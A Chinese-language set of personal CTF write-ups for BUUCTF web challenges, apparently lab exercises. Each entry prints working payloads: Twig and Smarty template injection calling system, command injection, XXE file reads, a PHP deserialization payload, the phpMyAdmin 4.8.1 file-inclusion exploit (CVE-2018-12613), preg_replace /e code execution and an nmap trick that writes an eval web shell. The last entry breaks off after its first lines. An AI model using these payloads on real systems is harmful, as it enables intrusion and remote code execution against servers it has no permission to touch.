BUU解题记录,乱七八糟的但大部分是Web题

[BJDCTF2020]Cookie is so stable

/flag.php

存在模板注入

{{3*3}} => %20%7b%7b%33%2a%33%7d%7d

{{3*'3'}} => %7b%7b%33%2a%27%33%27%7d%7d

Twig 模板注入

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("ls")} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%6c%73%22%29%7d%7d

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("ls /")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%6c%73%20%2f%22%29%7d%7d

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /flag")}} => %7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%72%65%67%69%73%74%65%72%55%6e%64%65%66%69%6e%65%64%46%69%6c%74%65%72%43%61%6c%6c%62%61%63%6b%28%22%73%79%73%74%65%6d%22%29%7d%7d%7b%7b%5f%73%65%6c%66%2e%65%6e%76%2e%67%65%74%46%69%6c%74%65%72%28%22%63%61%74%20%2f%66%6c%61%67%22%29%7d%7d

[WUSTCTF2020]朴实无华

扫目录

py -3 dirsearch.py -u http://a14b2b12-84cc-4091-ad39-ccb3ef43d269.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429

/robots.txt

User-agent: *
Disallow: /fAke_f1agggg.php

hint: Look_at_me: /fl4g.php

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

PHP/5.5.38 科学记数法绕过 intval 2e9

md5弱类型比较

0e215962017
=>
0e291242476940776845150308577824

黑名单绕过 ${IFS} 绕过空格

?num=2e9&md5=0e215962017&get_flag=ls

?num=2e9&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

[安洵杯 2019]easy_web

data 协议传输图片

<img src="data:image/gif;base64,PD9waHAKZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH4gRV9OT1RJQ0UpOwpoZWFkZXIoJ2NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwokY21kID0gJF9HRVRbJ2NtZCddOwppZiAoIWlzc2V0KCRfR0VUWydpbWcnXSkgfHwgIWlzc2V0KCRfR0VUWydjbWQnXSkpIAogICAgaGVhZGVyKCdSZWZyZXNoOjA7dXJsPS4vaW5kZXgucGhwP2ltZz1UWHBWZWs1VVRURk5iVlV6VFVSYWJFNXFZejAmY21kPScpOwokZmlsZSA9IGhleDJiaW4oYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKCRfR0VUWydpbWcnXSkpKTsKCiRmaWxlID0gcHJlZ19yZXBsYWNlKCIvW15hLXpBLVowLTkuXSsvIiwgIiIsICRmaWxlKTsKaWYgKHByZWdfbWF0Y2goIi9mbGFnL2kiLCAkZmlsZSkpIHsKICAgIGVjaG8gJzxpbWcgc3JjID0iLi9jdGYzLmpwZWciPic7CiAgICBkaWUoInhpeGnvvZ4gbm8gZmxhZyIpOwp9IGVsc2UgewogICAgJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsKICAgIGVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL2dpZjtiYXNlNjQsIiAuICR0eHQgLiAiJz48L2ltZz4iOwogICAgZWNobyAiPGJyPiI7Cn0KZWNobyAkY21kOwplY2hvICI8YnI+IjsKaWYgKHByZWdfbWF0Y2goIi9sc3xiYXNofHRhY3xubHxtb3JlfGxlc3N8aGVhZHx3Z2V0fHRhaWx8dml8Y2F0fG9kfGdyZXB8c2VkfGJ6bW9yZXxiemxlc3N8cGNyZXxwYXN0ZXxkaWZmfGZpbGV8ZWNob3xzaHxcJ3xcInxcYHw7fCx8XCp8XD98XFx8XFxcXHxcbnxcdHxccnxceEEwfFx7fFx9fFwofFwpfFwmW15cZF18QHxcfHxcXCR8XFt8XF18e3x9fFwofFwpfC18PHw+L2kiLCAkY21kKSkgewogICAgZWNobygiZm9yYmlkIH4iKTsKICAgIGVjaG8gIjxicj4iOwp9IGVsc2UgewogICAgaWYgKChzdHJpbmcpJF9QT1NUWydhJ10gIT09IChzdHJpbmcpJF9QT1NUWydiJ10gJiYgbWQ1KCRfUE9TVFsnYSddKSA9PT0gbWQ1KCRfUE9TVFsnYiddKSkgewogICAgICAgIGVjaG8gYCRjbWRgOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICgibWQ1IGlzIGZ1bm55IH4iKTsKICAgIH0KfQoKPz4KPGh0bWw+CjxzdHlsZT4KICBib2R5ewogICBiYWNrZ3JvdW5kOnVybCguL2JqLnBuZykgIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyOwogICBiYWNrZ3JvdW5kLXNpemU6Y292ZXI7CiAgIGJhY2tncm91bmQtYXR0YWNobWVudDpmaXhlZDsKICAgYmFja2dyb3VuZC1jb2xvcjojQ0NDQ0NDOwp9Cjwvc3R5bGU+Cjxib2R5Pgo8L2JvZHk+CjwvaHRtbD4=">

尝试解码 img 参数

两次 base64 解码,一次 hex 解码

TXpVek5UTTFNbVUzTURabE5qYz0
=> 
MzUzNTM1MmU3MDZlNjc=
=> 
3535352e706e67
=> 
555.webp

读取源码

index.php
=> 
696e6465782e706870
=> 
Njk2ZTY0NjU3ODJlNzA2ODcw
=> 
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

PD9waHAKZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH4gRV9OT1RJQ0UpOwpoZWFkZXIoJ2NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwokY21kID0gJF9HRVRbJ2NtZCddOwppZiAoIWlzc2V0KCRfR0VUWydpbWcnXSkgfHwgIWlzc2V0KCRfR0VUWydjbWQnXSkpIAogICAgaGVhZGVyKCdSZWZyZXNoOjA7dXJsPS4vaW5kZXgucGhwP2ltZz1UWHBWZWs1VVRURk5iVlV6VFVSYWJFNXFZejAmY21kPScpOwokZmlsZSA9IGhleDJiaW4oYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKCRfR0VUWydpbWcnXSkpKTsKCiRmaWxlID0gcHJlZ19yZXBsYWNlKCIvW15hLXpBLVowLTkuXSsvIiwgIiIsICRmaWxlKTsKaWYgKHByZWdfbWF0Y2goIi9mbGFnL2kiLCAkZmlsZSkpIHsKICAgIGVjaG8gJzxpbWcgc3JjID0iLi9jdGYzLmpwZWciPic7CiAgICBkaWUoInhpeGnvvZ4gbm8gZmxhZyIpOwp9IGVsc2UgewogICAgJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsKICAgIGVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL2dpZjtiYXNlNjQsIiAuICR0eHQgLiAiJz48L2ltZz4iOwogICAgZWNobyAiPGJyPiI7Cn0KZWNobyAkY21kOwplY2hvICI8YnI+IjsKaWYgKHByZWdfbWF0Y2goIi9sc3xiYXNofHRhY3xubHxtb3JlfGxlc3N8aGVhZHx3Z2V0fHRhaWx8dml8Y2F0fG9kfGdyZXB8c2VkfGJ6bW9yZXxiemxlc3N8cGNyZXxwYXN0ZXxkaWZmfGZpbGV8ZWNob3xzaHxcJ3xcInxcYHw7fCx8XCp8XD98XFx8XFxcXHxcbnxcdHxccnxceEEwfFx7fFx9fFwofFwpfFwmW15cZF18QHxcfHxcXCR8XFt8XF18e3x9fFwofFwpfC18PHw+L2kiLCAkY21kKSkgewogICAgZWNobygiZm9yYmlkIH4iKTsKICAgIGVjaG8gIjxicj4iOwp9IGVsc2UgewogICAgaWYgKChzdHJpbmcpJF9QT1NUWydhJ10gIT09IChzdHJpbmcpJF9QT1NUWydiJ10gJiYgbWQ1KCRfUE9TVFsnYSddKSA9PT0gbWQ1KCRfUE9TVFsnYiddKSkgewogICAgICAgIGVjaG8gYCRjbWRgOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICgibWQ1IGlzIGZ1bm55IH4iKTsKICAgIH0KfQoKPz4KPGh0bWw+CjxzdHlsZT4KICBib2R5ewogICBiYWNrZ3JvdW5kOnVybCguL2JqLnBuZykgIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyOwogICBiYWNrZ3JvdW5kLXNpemU6Y292ZXI7CiAgIGJhY2tncm91bmQtYXR0YWNobWVudDpmaXhlZDsKICAgYmFja2dyb3VuZC1jb2xvcjojQ0NDQ0NDOwp9Cjwvc3R5bGU+Cjxib2R5Pgo8L2JvZHk+CjwvaHRtbD4=

base64 解码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

md5 强类型比较

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

cmd 传参处 dir 没有过滤

\绕过正则匹配

[NCTF2019]Fake XML cookbook

XXE使用file协议读取flag

XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE username [
    <!ENTITY file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>0</password></user>

[强网杯 2019]高明的黑客

/www.tar.gz

下载源码

需要找到可以利用的有效代码段

有许多可用的脚本,如下

$XnEGfa = $_GET['Efa5BVG'] ?? ' ';

[BJDCTF2020]Mark loves cat

在 CONTACT 处尝试后无果

扫目录

GitHack 下载源码

index.php

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

 ?>

flag.php

<?php

$flag = file_get_contents('/flag');

?>

exit 输出一个消息并且退出当前脚本,当参数是字符串时输出字符串,当参数为 int 型时作为退出状态码不会输出,退出状态码为0时成功中止

foreach 函数存在变量覆盖

get 传参时变量名不能为 flag 且 变量值为 flag 时输出当前 $handsome 的值

当 get post 的参数不含 flag 时输出当前 $yds 的值

当 get post 的参数同为 flag 时输出当前 $is 的值

yds=flag

is=flag&flag=flag

handsome=flag&flag=x&x=flag

[BSidesCF 2020]Had a bad day

category=php://filter/read=convert.base64-encode/resource=index.php

include(php://filter/read=convert.base64-encode/resource=index.php.php)

报错提示多了个 .php

category=php://filter/read=convert.base64-encode/resource=index

PGh0bWw+CiAgPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UiPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IkltYWdlcyB0aGF0IHNwYXJrIGpveSI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCwgbWluaW11bS1zY2FsZT0xLjAiPgogICAgPHRpdGxlPkhhZCBhIGJhZCBkYXk/PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL21hdGVyaWFsLm1pbi5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3Mvc3R5bGUuY3NzIj4KICA8L2hlYWQ+CiAgPGJvZHk+CiAgICA8ZGl2IGNsYXNzPSJwYWdlLWxheW91dCBtZGwtbGF5b3V0IG1kbC1sYXlvdXQtLWZpeGVkLWhlYWRlciBtZGwtanMtbGF5b3V0IG1kbC1jb2xvci0tZ3JleS0xMDAiPgogICAgICA8aGVhZGVyIGNsYXNzPSJwYWdlLWhlYWRlciBtZGwtbGF5b3V0X19oZWFkZXIgbWRsLWxheW91dF9faGVhZGVyLS1zY3JvbGwgbWRsLWNvbG9yLS1ncmV5LTEwMCBtZGwtY29sb3ItdGV4dC0tZ3JleS04MDAiPgogICAgICAgIDxkaXYgY2xhc3M9Im1kbC1sYXlvdXRfX2hlYWRlci1yb3ciPgogICAgICAgICAgPHNwYW4gY2xhc3M9Im1kbC1sYXlvdXQtdGl0bGUiPkhhZCBhIGJhZCBkYXk/PC9zcGFuPgogICAgICAgICAgPGRpdiBjbGFzcz0ibWRsLWxheW91dC1zcGFjZXIiPjwvZGl2PgogICAgICAgIDxkaXY+CiAgICAgIDwvaGVhZGVyPgogICAgICA8ZGl2IGNsYXNzPSJwYWdlLXJpYmJvbiI+PC9kaXY+CiAgICAgIDxtYWluIGNsYXNzPSJwYWdlLW1haW4gbWRsLWxheW91dF9fY29udGVudCI+CiAgICAgICAgPGRpdiBjbGFzcz0icGFnZS1jb250YWluZXIgbWRsLWdyaWQiPgogICAgICAgICAgPGRpdiBjbGFzcz0ibWRsLWNlbGwgbWRsLWNlbGwtLTItY29sIG1kbC1jZWxsLS1oaWRlLXRhYmxldCBtZGwtY2VsbC0taGlkZS1waG9uZSI+PC9kaXY+CiAgICAgICAgICA8ZGl2IGNsYXNzPSJwYWdlLWNvbnRlbnQgbWRsLWNvbG9yLS13aGl0ZSBtZGwtc2hhZG93LS00ZHAgY29udGVudCBtZGwtY29sb3ItdGV4dC0tZ3JleS04MDAgbWRsLWNlbGwgbWRsLWNlbGwtLTgtY29sIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icGFnZS1jcnVtYnMgbWRsLWNvbG9yLXRleHQtLWdyZXktNTAwIj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDxoMz5DaGVlciB1cCE8L2gzPgogICAgICAgICAgICAgIDxwPgogICAgICAgICAgICAgICAgRGlkIHlvdSBoYXZlIGEgYmFkIGRheT8gRGlkIHRoaW5ncyBub3QgZ28geW91ciB3YXkgdG9kYXk/IEFyZSB5b3UgZmVlbGluZyBkb3duPyBQaWNrIGFuIG9wdGlvbiBhbmQgbGV0IHRoZSBhZG9yYWJsZSBpbWFnZXMgY2hlZXIgeW91IHVwIQogICAgICAgICAgICAgIDwvcD4KICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwYWdlLWluY2x1ZGUiPgogICAgICAgICAgICAgIDw/cGhwCgkJCQkkZmlsZSA9ICRfR0VUWydjYXRlZ29yeSddOwoKCQkJCWlmKGlzc2V0KCRmaWxlKSkKCQkJCXsKCQkJCQlpZiggc3RycG9zKCAkZmlsZSwgIndvb2ZlcnMiICkgIT09ICBmYWxzZSB8fCBzdHJwb3MoICRmaWxlLCAibWVvd2VycyIgKSAhPT0gIGZhbHNlIHx8IHN0cnBvcyggJGZpbGUsICJpbmRleCIpKXsKCQkJCQkJaW5jbHVkZSAoJGZpbGUgLiAnLnBocCcpOwoJCQkJCX0KCQkJCQllbHNlewoJCQkJCQllY2hvICJTb3JyeSwgd2UgY3VycmVudGx5IG9ubHkgc3VwcG9ydCB3b29mZXJzIGFuZCBtZW93ZXJzLiI7CgkJCQkJfQoJCQkJfQoJCQkJPz4KCQkJPC9kaXY+CiAgICAgICAgICA8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJnZXQiIGlkPSJjaG9pY2UiPgogICAgICAgICAgICAgIDxjZW50ZXI+PGJ1dHRvbiBvbmNsaWNrPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY2hvaWNlJykuc3VibWl0KCk7IiBuYW1lPSJjYXRlZ29yeSIgdmFsdWU9Indvb2ZlcnMiIGNsYXNzPSJtZGwtYnV0dG9uIG1kbC1idXR0b24tLWNvbG9yZWQgbWRsLWJ1dHRvbi0tcmFpc2VkIG1kbC1qcy1idXR0b24gbWRsLWpzLXJpcHBsZS1lZmZlY3QiIGRhdGEtdXBncmFkZWQ9IixNYXRlcmlhbEJ1dHRvbixNYXRlcmlhbFJpcHBsZSI+V29vZmVyczxzcGFuIGNsYXNzPSJtZGwtYnV0dG9uX19yaXBwbGUtY29udGFpbmVyIj48c3BhbiBjbGFzcz0ibWRsLXJpcHBsZSBpcy1hbmltYXRpbmciIHN0eWxlPSJ3aWR0aDogMTg5LjM1NnB4OyBoZWlnaHQ6IDE4OS4zNTZweDsgdHJhbnNmb3JtOiB0cmFuc2xhdGUoLTUwJSwgLTUwJSkgdHJhbnNsYXRlKDMxcHgsIDI1cHgpOyI+PC9zcGFuPjwvc3Bhbj48L2J1dHRvbj4KICAgICAgICAgICAgICA8YnV0dG9uIG9uY2xpY2s9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjaG9pY2UnKS5zdWJtaXQoKTsiIG5hbWU9ImNhdGVnb3J5IiB2YWx1ZT0ibWVvd2VycyIgY2xhc3M9Im1kbC1idXR0b24gbWRsLWJ1dHRvbi0tY29sb3JlZCBtZGwtYnV0dG9uLS1yYWlzZWQgbWRsLWpzLWJ1dHRvbiBtZGwtanMtcmlwcGxlLWVmZmVjdCIgZGF0YS11cGdyYWRlZD0iLE1hdGVyaWFsQnV0dG9uLE1hdGVyaWFsUmlwcGxlIj5NZW93ZXJzPHNwYW4gY2xhc3M9Im1kbC1idXR0b25fX3JpcHBsZS1jb250YWluZXIiPjxzcGFuIGNsYXNzPSJtZGwtcmlwcGxlIGlzLWFuaW1hdGluZyIgc3R5bGU9IndpZHRoOiAxODkuMzU2cHg7IGhlaWdodDogMTg5LjM1NnB4OyB0cmFuc2Zvcm06IHRyYW5zbGF0ZSgtNTAlLCAtNTAlKSB0cmFuc2xhdGUoMzFweCwgMjVweCk7Ij48L3NwYW4+PC9zcGFuPjwvYnV0dG9uPjwvY2VudGVyPgogICAgICAgICAgPC9mb3JtPgoKICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICA8L21haW4+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQgc3JjPSJqcy9tYXRlcmlhbC5taW4uanMiPjwvc2NyaXB0PgogIDwvYm9keT4KPC9odG1sPg==

<?php
   $file = $_GET['category'];
   
   if(isset($file))
   {
       if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
           include ($file . '.php');
       }
       else{
           echo "Sorry, we currently only support woofers and meowers.";
       }
   }
?>

参数被限制为 woofers meowers index

伪协议嵌套其中一个达到可以匹配 flag 的目的

php://filter/read=convert.base64-encode/woofers/resource=flag

也可以这样构造

category=php://filter/read=convert.base64-encode/resource=woofers/../flag

PCEtLSBDYW4geW91IHJlYWQgdGhpcyBmbGFnPyAtLT4KPD9waHAKIC8vIGZsYWd7MWUwNzY5N2ItYjc1OC00ZDNhLWFhOTEtYmEwNWM0ZDg4MDQ3fQo/Pgo=
<!-- Can you read this flag? -->
<?php
 // flag{1e07697b-b758-4d3a-aa91-ba05c4d88047}
?>

[网鼎杯 2020 朱雀组]phpweb

func=date&p=Y-m-d+h%3Ai%3As+a

调用 date 函数并传入 “Y-m-d h:i:s a”

尝试获取源码

尝试调用 readfile file_get_contents highlight_file 函数

func=readfile&p=index.php

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

__destruct

<?php
class Test {
    var $func="system";
    var $p = "cat $(find / -name flag*";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$a=new Test();
echo serialize($a);
?>
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:25:"cat $(find / -name flag*)";}

反斜杠绕过黑名单

[GWCTF 2019]我有一个数据库

编码有问题

扫目录

phpMyAdmin 版本号是 4.8.1

查到 CVE-2018-12613

phpmyadmin4.8.1后台getshell

?target=db_sql.php%253f/../../../../../../../../etc/passwd

?target=db_sql.php%253f/../../../../../../../../flag

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

SELECT '<?php phpinfo()?>';

查看 SESSION ID

?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_5nl1lmmrps8lfjr2l8upr9h9g3

SHOW variables LIKE '%datadir%';

?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/test/test.frm

[BJDCTF2020]ZJCTF,不过如此

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

php伪协议,文件包含,preg_replace函数e模式

php://input post 传输 I have a dream

data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
file=php://filter/read=convert.base64-encode/resource=next.php

PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id; 

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

CVE-2016-5734 由 preg_replace 引发的 RCE

深入研究preg_replace与代码执行

?\S*={${phpinfo()}}

?\S*=${getFlag()}&cmd=system('cat /flag');

L1ch师傅的另一种思路

?\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}

[GXYCTF2019]禁止套娃

扫目录发现 .git

GitHack 获取源码

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

过滤了 php 伪协议

(?R)? 递归调用当前整个匹配模式,即匹配可以无限嵌套的无参数函数

无参数RCE

print_r(scandir(‘.’)); 查看当前目录及文件

限制不含参数,即用 current(localeconv()) 代替

flag.php 为倒数第二个值,反转顺序后向前一位将指向 flag.php

print_r(next(array_reverse(scandir(current(localeconv())))));

返回随机键名后反转键名与键值,多次随机后得到想要的键值

print_r(array_rand(array_flip(scandir(current(localeconv())))));

readfile(next(array_reverse(scandir(current(localeconv())))));

[BJDCTF2020]The mystery of ip

通过 X-Forwarded-For 或 Client-IP 伪造 ip 参数

Smarty SSTI PHP

{$smarty.version}

3.1.34-dev-7

{if phpinfo()}{/if}

{php}phpinfo();{/php} (仅在Smarty3.1的SmartyBC中有效)

X-Forwarded-For: {system(‘cat /flag’)}

[BUUCTF 2018]Online Tool

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
?>

host 随便传个 ip 后执行 nmap 命令

escapeshellarg 给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号

escapeshellcmd 反斜线(\)会在以下字符之前插入: & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A 和 \xFF, ‘ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替

' <?php @eval($_POST["ba2in9a"]);?> -oG ba2in9a.php '

' <?php @eval($_POST["ba2in9a"]);?> -oG ba2in9a.php '

' \<\?php @eval\(\$_POST\[\"ba2in9a\"\]\)\;\?\> -oG ba2in9a.php '

[RoarCTF 2019]Easy Java

账号密码分别是 admin admin888

登陆后没有任何可用信息

查看 help 页面

抛出异常 java.io.FileNotFoundException:{help.docx}

请求方式改为 post

没有可用信息

查看别人的WP得知可以查看 WEB-INF/web.xml

servlet-class 存放在 /WEB-INF/classes 目录下

base64 解码即可得到 flag

[GXYCTF2019]BabyUpload

<?php
session_start();
